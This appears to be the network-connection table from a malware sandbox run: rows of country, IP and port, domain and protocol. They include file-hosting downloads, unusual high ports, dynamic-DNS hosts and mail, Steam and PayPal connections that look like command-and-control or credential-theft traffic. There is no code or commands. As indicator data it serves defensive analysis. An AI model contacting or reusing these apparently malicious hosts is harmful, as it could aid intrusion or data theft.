| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 13.107.43.13:443 | onedrive.live.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 194.49.94.152:50500 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | www.xotikvpn.xyz | udp |
| US | 162.255.119.91:80 | www.xotikvpn.xyz | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 91.215.85.63:5225 | center.onthewifi.com | tcp |
| US | 129.153.80.87:8855 | tcp | |
| US | 8.8.8.8:53 | stun1.l.google.com | udp |
| US | 8.8.8.8:53 | 91.119.255.162.in-addr.arpa | udp |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| FI | 64.233.164.127:19302 | stun1.l.google.com | udp |
| US | 8.8.8.8:53 | steamcommunity.com | udp |
| NL | 23.222.49.98:443 | steamcommunity.com | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| US | 8.8.8.8:53 | 98.49.222.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | api.steampowered.com | udp |
| NL | 23.222.49.98:80 | api.steampowered.com | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 13.107.42.13:443 | onedrive.live.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | www.hupkeo.link | udp |
| DE | 91.195.240.19:80 | www.hupkeo.link | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| US | 13.107.43.13:443 | onedrive.live.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | 19.240.195.91.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.tecverse.xyz | udp |
| US | 203.161.61.170:80 | www.tecverse.xyz | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 194.49.94.152:50500 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | gservicese.com | udp |
| US | 8.8.8.8:53 | www.paypal.com | udp |
| US | 151.101.1.21:443 | www.paypal.com | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| RU | 91.215.85.63:2718 | gservicese.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | www.ljwixsb.top | udp |
| US | 13.107.42.13:443 | onedrive.live.com | tcp |
| RU | 185.172.128.100:80 | 185.172.128.100 | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | files.catbox.moe | udp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 13.107.43.13:443 | onedrive.live.com | tcp |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| BG | 185.141.63.4:1074 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| BG | 185.141.63.4:1074 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| DE | 136.243.92.92:80 | www.mobdigim.com | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 194.49.94.152:50500 | tcp | |
| US | 8.8.8.8:53 | center.onthewifi.com | udp |
| RU | 91.215.85.63:8118 | center.onthewifi.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 129.153.80.87:8855 | tcp | |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 91.194.2.86:80 | www.finebb.net | tcp |
| US | 13.107.42.13:443 | onedrive.live.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | service-domain.xyz | udp |
| US | 3.80.150.121:443 | service-domain.xyz | tcp |
| US | 13.107.43.13:443 | onedrive.live.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| BG | 185.141.63.4:1074 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | 106.39.251.142.in-addr.arpa | udp |
| BG | 185.141.63.4:1074 | tcp | |
| HK | 34.92.57.107:80 | www.yf168vip.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 194.49.94.152:50500 | tcp | |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 13.107.42.13:443 | onedrive.live.com | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| BG | 185.141.63.4:1074 | tcp | |
| US | 13.248.169.48:80 | www.shortfall.net | tcp |
| US | 8.8.8.8:53 | listpoints.online | udp |
| US | 8.8.8.8:53 | retghrtgwtrgtg.bounceme.net | udp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 13.107.43.13:443 | onedrive.live.com | tcp |
| US | 8.8.8.8:53 | twitter.com | udp |
| US | 104.244.42.1:443 | twitter.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| US | 8.8.8.8:53 | 1.42.244.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.tiltedjava.net | udp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| FR | 217.70.184.50:80 | www.tiltedjava.net | tcp |
| US | 8.8.8.8:53 | www.paypal.com | udp |
| US | 151.101.1.21:443 | www.paypal.com | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | 50.184.70.217.in-addr.arpa | udp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 203.161.61.170:80 | www.tecverse.xyz | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | steamcommunity.com | udp |
| NL | 23.222.49.98:443 | steamcommunity.com | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | api.922proxy.com | udp |
| US | 172.67.71.94:443 | api.922proxy.com | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| US | 8.8.8.8:53 | 94.71.67.172.in-addr.arpa | udp |
| BG | 185.141.63.253:80 | ewixgdb.ua | tcp |
| NL | 23.222.49.98:443 | steamcommunity.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| US | 194.49.94.152:50500 | tcp | |
| US | 8.8.8.8:53 | imap.ziggo.nl | udp |
| NL | 84.116.6.3:993 | imap.ziggo.nl | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| US | 129.153.80.87:8855 | tcp | |
| US | 172.67.71.94:443 | api.922proxy.com | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| US | 8.8.8.8:53 | api.twitter.com | udp |
| US | 8.8.8.8:53 | listpoints.click | udp |
| RU | 91.215.85.63:7020 | listpoints.click | tcp |
| US | 104.244.42.194:443 | api.twitter.com | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| US | 8.8.8.8:53 | imap.telfort.nl | udp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| NL | 195.121.65.134:993 | imap.telfort.nl | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| US | 13.107.42.13:443 | onedrive.live.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | 194.42.244.104.in-addr.arpa | udp |
| US | 172.67.71.94:443 | api.922proxy.com | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | 134.65.121.195.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.a0zu3im002.cfd | udp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 172.67.71.94:443 | api.922proxy.com | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| US | 13.107.43.13:443 | onedrive.live.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 172.67.71.94:443 | api.922proxy.com | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 172.67.71.94:443 | api.922proxy.com | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | www.cmmug.asia | udp |
| US | 172.67.167.215:80 | www.cmmug.asia | tcp |
| US | 172.67.71.94:443 | api.922proxy.com | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| US | 8.8.8.8:53 | 215.167.67.172.in-addr.arpa | udp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 172.67.71.94:443 | api.922proxy.com | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| US | 194.49.94.152:50500 | tcp | |
| US | 13.107.42.13:443 | onedrive.live.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 172.67.71.94:443 | api.922proxy.com | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | www.333vvs.com | udp |
| US | 8.8.8.8:53 | xo.nate.com | udp |
| US | 172.67.71.94:443 | api.922proxy.com | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| KR | 203.226.254.20:443 | xo.nate.com | tcp |
| US | 35.244.161.158:80 | www.333vvs.com | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| US | 13.107.43.13:443 | onedrive.live.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | 158.161.244.35.in-addr.arpa | udp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | 20.254.226.203.in-addr.arpa | udp |
| US | 172.67.71.94:443 | api.922proxy.com | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| RU | 91.215.85.63:5225 | listpoints.click | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| KR | 203.226.254.20:443 | xo.nate.com | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| TR | 185.83.146.204:80 | www.hreeremaeps.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 13.248.169.48:80 | www.shortfall.net | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 194.49.94.152:50500 | tcp | |
| US | 13.107.42.13:443 | onedrive.live.com | tcp |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| US | 129.153.80.87:8855 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | member.nate.com | udp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| KR | 203.226.254.21:443 | member.nate.com | tcp |
| US | 8.8.8.8:53 | api.steampowered.com | udp |
| NL | 23.222.49.98:80 | api.steampowered.com | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| BG | 185.141.63.4:1074 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 208.91.197.132:80 | www.shopbons-mall.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 151.101.1.21:443 | www.paypal.com | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| US | 8.8.8.8:53 | 21.254.226.203.in-addr.arpa | udp |
| US | 13.107.43.13:443 | onedrive.live.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | m-api.nexon.com | udp |
| JP | 52.193.97.244:443 | m-api.nexon.com | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| US | 8.8.8.8:53 | www.stericyclehq.com | udp |
| US | 8.8.8.8:53 | 244.97.193.52.in-addr.arpa | udp |
| IT | 81.17.18.196:80 | www.stericyclehq.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | steamcommunity.com | udp |
| NL | 23.222.49.98:443 | steamcommunity.com | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| US | 13.107.42.13:443 | onedrive.live.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| NL | 23.222.49.98:443 | steamcommunity.com | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| US | 194.49.94.152:50500 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| HK | 34.92.57.107:80 | www.yf168vip.com | tcp |
| US | 13.107.43.13:443 | onedrive.live.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| RU | 91.215.85.63:8118 | listpoints.click | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 35.244.161.158:80 | www.333vvs.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 13.107.42.13:443 | onedrive.live.com | tcp |
| NL | 23.222.49.98:443 | steamcommunity.com | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 194.49.94.152:50500 | tcp | |
| US | 129.153.80.87:8855 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| US | 13.107.43.13:443 | onedrive.live.com | tcp |
| US | 8.8.8.8:53 | www.bord90-1us.click | udp |
| US | 188.114.97.0:80 | www.bord90-1us.click | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | mail.xs4all.nl | udp |
| NL | 195.121.65.192:993 | mail.xs4all.nl | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| US | 8.8.8.8:53 | 192.65.121.195.in-addr.arpa | udp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 104.20.68.143:443 | pastebin.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| US | 8.8.8.8:53 | flyawayaero.net | udp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 104.21.93.225:443 | flyawayaero.net | tcp |
| US | 8.8.8.8:53 | gobo25cl.top | udp |
| US | 8.8.8.8:53 | redirector.pm | udp |
| US | 172.67.197.19:80 | gobo25cl.top | tcp |
| US | 8.8.8.8:53 | net.geo.opera.com | udp |
| US | 8.8.8.8:53 | potatogoose.com | udp |
| US | 8.8.8.8:53 | northmuyaspropertyinvestment.com | udp |
| US | 194.49.94.85:443 | redirector.pm | tcp |
| US | 104.21.35.235:443 | potatogoose.com | tcp |
| US | 172.67.197.19:443 | gobo25cl.top | tcp |
| BG | 91.92.243.139:80 | 91.92.243.139 | tcp |
| TR | 78.135.105.12:443 | northmuyaspropertyinvestment.com | tcp |
| US | 8.8.8.8:53 | yip.su | udp |
| NL | 185.26.182.111:80 | net.geo.opera.com | tcp |
| NL | 185.26.182.111:443 | net.geo.opera.com | tcp |
| US | 188.114.96.0:443 | yip.su | tcp |
| US | 104.20.68.143:443 | pastebin.com | tcp |
| US | 188.114.96.0:443 | yip.su | tcp |
| MY | 111.90.146.230:80 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | 111.182.26.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | sl.himanfast.com | udp |
| US | 172.67.197.19:80 | gobo25cl.top | tcp |
| US | 172.67.197.19:443 | gobo25cl.top | tcp |
| US | 188.114.96.0:80 | sl.himanfast.com | tcp |
| US | 8.8.8.8:53 | www.dp-0912.com | udp |
| US | 8.8.8.8:53 | thecrazymonkey.org | udp |
| US | 104.21.35.228:80 | www.dp-0912.com | tcp |
| US | 194.49.94.85:443 | redirector.pm | tcp |
| NL | 185.26.182.111:80 | net.geo.opera.com | tcp |
| BG | 91.92.243.139:80 | 91.92.243.139 | tcp |
| NL | 185.26.182.111:443 | net.geo.opera.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | 228.35.21.104.in-addr.arpa | udp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 13.107.42.13:443 | onedrive.live.com | tcp |
| US | 8.8.8.8:53 | listpoints.online | udp |
| RU | 91.215.85.63:3839 | listpoints.click | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | steamcommunity.com | udp |
| US | 151.101.1.21:443 | www.paypal.com | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| NL | 23.222.49.98:443 | steamcommunity.com | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| BG | 185.141.63.4:1074 | tcp | |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| US | 13.107.43.13:443 | onedrive.live.com | tcp |
| US | 194.49.94.152:50500 | tcp | |
| BG | 185.141.63.4:1074 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| US | 8.8.8.8:53 | i.instagram.com | udp |
| US | 8.8.8.8:53 | www.duadqps.com | udp |
| FR | 157.240.196.63:443 | i.instagram.com | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| HK | 38.238.229.24:80 | www.duadqps.com | tcp |
| US | 8.8.8.8:53 | 63.196.240.157.in-addr.arpa | udp |
| BG | 185.141.63.253:80 | ewixgdb.ua | tcp |
| US | 8.8.8.8:53 | www.gdyanjiu.icu | udp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| HK | 8.217.92.5:80 | www.gdyanjiu.icu | tcp |
| US | 13.107.42.13:443 | onedrive.live.com | tcp |
| US | 8.8.8.8:53 | 24.229.238.38.in-addr.arpa | udp |
| BG | 185.141.63.4:1074 | tcp | |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| US | 13.107.43.13:443 | onedrive.live.com | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| BG | 185.141.63.4:1074 | tcp | |
| US | 194.49.94.152:50500 | tcp | |
| US | 129.153.80.87:8855 | tcp | |
| US | 8.8.8.8:53 | autoupdate.geo.opera.com | udp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | www.gdyanjiu.icu | udp |
| HK | 8.217.92.5:80 | www.gdyanjiu.icu | tcp |
| NL | 185.26.182.123:443 | autoupdate.geo.opera.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| NL | 82.145.217.121:443 | desktop-netinstaller-sub.osp.opera.software | tcp |
| US | 8.8.8.8:53 | desktop-netinstaller-sub.osp.opera.software | udp |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| NL | 82.145.217.121:443 | desktop-netinstaller-sub.osp.opera.software | tcp |
| NL | 185.26.182.123:443 | autoupdate.geo.opera.com | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| US | 8.8.8.8:53 | work.a-poster.info | udp |
| NL | 37.1.217.172:25000 | work.a-poster.info | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| US | 8.8.8.8:53 | download.opera.com | udp |
| NL | 82.145.216.23:443 | download.opera.com | tcp |
| US | 13.248.169.48:80 | www.shortfall.net | tcp |
| US | 13.107.42.13:443 | onedrive.live.com | tcp |
| NL | 23.222.49.98:443 | steamcommunity.com | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | 172.217.1.37.in-addr.arpa | udp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| US | 13.107.43.13:443 | onedrive.live.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | download3.operacdn.com | udp |
| NL | 2.19.194.43:443 | download3.operacdn.com | tcp |
| US | 8.8.8.8:53 | www.instagram.com | udp |
| US | 194.49.94.152:50500 | tcp | |
| NL | 157.240.247.174:443 | www.instagram.com | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| US | 203.161.61.170:80 | www.tecverse.xyz | tcp |
| US | 8.8.8.8:53 | 43.194.19.2.in-addr.arpa | udp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | 174.247.240.157.in-addr.arpa | udp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 151.101.1.21:443 | www.paypal.com | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 13.107.42.13:443 | onedrive.live.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 172.67.71.94:443 | api.922proxy.com | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 13.107.43.13:443 | onedrive.live.com | tcp |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| HK | 8.217.92.5:80 | www.gdyanjiu.icu | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | www.pdian.link | udp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 194.49.94.152:50500 | tcp | |
| US | 129.153.80.87:8855 | tcp | |
| US | 8.8.8.8:53 | www.buddyurns.com | udp |
| RU | 91.215.85.63:7020 | listpoints.click | tcp |
| FR | 213.186.33.5:80 | www.buddyurns.com | tcp |
| US | 8.8.8.8:53 | 5.33.186.213.in-addr.arpa | udp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | t.me | udp |
| US | 8.8.8.8:53 | www.pdian.link | udp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| US | 13.107.42.13:443 | onedrive.live.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | steamcommunity.com | udp |
| NL | 23.222.49.98:443 | steamcommunity.com | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| DE | 195.201.255.35:443 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| DE | 195.201.255.35:443 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 13.107.43.13:443 | onedrive.live.com | tcp |
| DE | 195.201.255.35:443 | tcp | |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| DE | 195.201.255.35:443 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | www.antsnav.com | udp |
| US | 104.21.79.64:80 | www.antsnav.com | tcp |
| US | 194.49.94.152:50500 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | datastream.myvnc.com | udp |
| RU | 91.215.85.63:5225 | datastream.myvnc.com | tcp |
| US | 8.8.8.8:53 | www.xotikvpn.xyz | udp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 162.255.119.91:80 | www.xotikvpn.xyz | tcp |
| US | 13.107.42.13:443 | onedrive.live.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| DE | 195.201.255.35:443 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 13.107.43.13:443 | onedrive.live.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| GB | 212.3.242.82:143 | mail.be | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| DE | 195.201.255.35:443 | tcp | |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | 82.242.3.212.in-addr.arpa | udp |
| DE | 195.201.255.35:443 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | steamcommunity.com | udp |
| NL | 23.222.49.98:443 | steamcommunity.com | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 194.49.94.152:50500 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 129.153.80.87:8855 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
